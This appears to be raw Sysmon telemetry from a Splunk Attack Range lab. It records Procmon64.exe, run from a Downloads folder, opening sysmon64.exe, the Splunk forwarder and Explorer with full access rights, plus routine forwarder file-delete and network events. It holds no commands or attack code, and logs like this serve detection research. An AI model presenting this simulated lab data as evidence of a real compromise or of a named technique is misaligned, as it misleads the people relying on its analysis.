10:52:05.280{C8EA50B7-11CB-6216-2005-000000003802}2328224C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:05.280{C8EA50B7-11CB-6216-2005-000000003802}2328224C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F144-6215-7700-000000003802}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:05.180{C8EA50B7-11CB-6216-2005-000000003802}2328224C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F144-6215-7700-000000003802}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:05.180{C8EA50B7-11CB-6216-2005-000000003802}2328224C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216898Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:06.877{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33EA1B585C5815D962BC457BDFACB58E,SHA256=8D1313B5017699E0B26D50E8608007DF01E813CE7141F0270B48C5AA62E7EA5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:06.664{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DB3A25B6D92549490B6290D09F3785B,SHA256=C065C961C76518144F61336D31E49B931E1770E0A6B44E14186EBF7C58852FD4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216897Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:03.586{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51356-false10.0.1.12-8000- 23542300x8000000000000000288902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:07.679{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=435E195354F7FD86168CDACECF9BAFA9,SHA256=38981DB2C4C5C06F583FD5DCA6029A8D14CE8859AF9BEB2A896D1E9058343D12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:08.695{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71D98B940601DDAE5EDCC166525D8B48,SHA256=8B8ECACC10354A35C622FC389AB62E6AF4E400A0407B17C560BF0F51B3003A29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216899Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:08.095{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C49B1F4AE344B5C9ABCFFD82B0B8F0E,SHA256=16799A7789C77CFFADDF25A6312E3FE41E678A8BAC03E139B51EF737D1D08DC3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:05.637{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53494-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000288905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:09.711{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E709D1EAE4F0E71EB910AA50EECE79F,SHA256=020E99C2AEA2073107F1F3DDFAD448253C67F2A6A532B804C8737B0CAE8AEEF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216900Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:09.330{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FE5A354CC588CD3F0F33A078EB32663,SHA256=4D4DF3DB04B5025705B6BCB5508E276CC7DAF0F54AC07318D89837E0F6487AF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:10.712{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86CC2C8C2E8844AA6007666C12589665,SHA256=545FC156F6218335A53DC2AD8A9CE5187A7869771C8C735F9DFE2BC52651BFC7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216902Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:08.634{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51357-false10.0.1.12-8000- 23542300x8000000000000000216901Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:10.377{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E3F5661233CC3FAC52B7AE16192C6CC,SHA256=0A5344B77D57729F10FC385EE7FCBA75F1FBED7749160D9250FC20600A886CFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:11.729{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=362FC4308DC04B91F9C4C74CF8C80906,SHA256=89CE5A4663455DC7F13211AEB97286D7F3EC3A345BDD6B0035581D6D4BF46463,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216903Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:11.377{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5407E6292988063D1AE445DBB5B1560C,SHA256=16B1FFE21E8D5F56E9BDE7989AA4FC437B8679205D1790C460138D12ACC795D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:12.729{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=100B600F694A529D47DF9BD66FDE062C,SHA256=DCB63AB90ED4EBEAF8BE5A79657BA12A83AA1A43745FE305C14E8BD3BD2ABEAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216904Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:12.392{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF17110D00EC7CD6CFA6F2C4A75A2070,SHA256=4F30EF3F922B775839D6BE7D22D937786477669D9A8F44D8650993A95D8B7042,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:12.250{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:12.250{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:12.250{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:12.227{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:12.227{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:12.227{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:12.212{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:12.212{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:12.212{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:12.212{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:13.731{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A89E68B1B14B6A26375874E659597CD,SHA256=808E723DC48C3D585F5C48D63E6957980B74B4F392CD0A27A8B48D2EC910586B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216905Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:13.408{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6843BA4B18C62A23F45A7F076EF2B9FB,SHA256=0D761799BFC85AE9AEAE385D562A51CCB72EC33E88966A77F6371E1362218425,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:11.539{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53495-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000288921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:14.755{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E22043768BAC57939AA3807332FCAD24,SHA256=9451ACD8A3EA1797EE0C709F317E984BFA1A68982E1C5A268C3D64E750CCDC3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216906Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:14.424{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=740644BC73DABA83890146D8DB6EC49A,SHA256=C9701CA68389AE0BA25BFC033C63DFC12788C32A547726AB63F71DB2802C14B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:15.770{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FFB161AE57788494F504629A5F69BC7,SHA256=AABFECE0EFFE7D9C3673118E6552989A503C86FFC9A74BA2DA7A1B9A9B031442,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216907Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:15.424{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CEAB899C49CE794EF96EBB25DF15E56,SHA256=83206B419327778103D38DA0CF84E64F906E46AFAD87E80E182C382F4095AE79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:16.792{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1956B247F749217E68D34EEB6318BE55,SHA256=D2E9CAB2CB3E5C104F75174ADE3C4D4F3C8123A53AD51303B2EA4B302EB85A01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216908Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:16.439{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0469D55AECE222CF9282FC16ED20F517,SHA256=9F7F7A24184A322A75204726DE915FEFA1CE6C2FB7F8AC4275CED86B6A8A21F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:17.838{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAC10464FD0671CDF7C823A086C0F801,SHA256=0B0EA683023D153CB64AEBD6801732BA2492CBC62D67510D817BA96CAED99AEF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216910Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:14.601{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51358-false10.0.1.12-8000- 23542300x8000000000000000216909Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:17.455{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44EF68D3E1A0FAED7E3B5CDD31539E2C,SHA256=1364437ABEBB6D4E2AB0FD577964789855D6E070DE9E23F24E425EA699195614,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:18.860{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A3F1A393B74C7DDE8E7F5AC4E10D3FC,SHA256=530D8995BEFB6266CED8B20F911CA8EBA0E24D872A95AFA42B0975622D8412E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216911Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:18.470{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 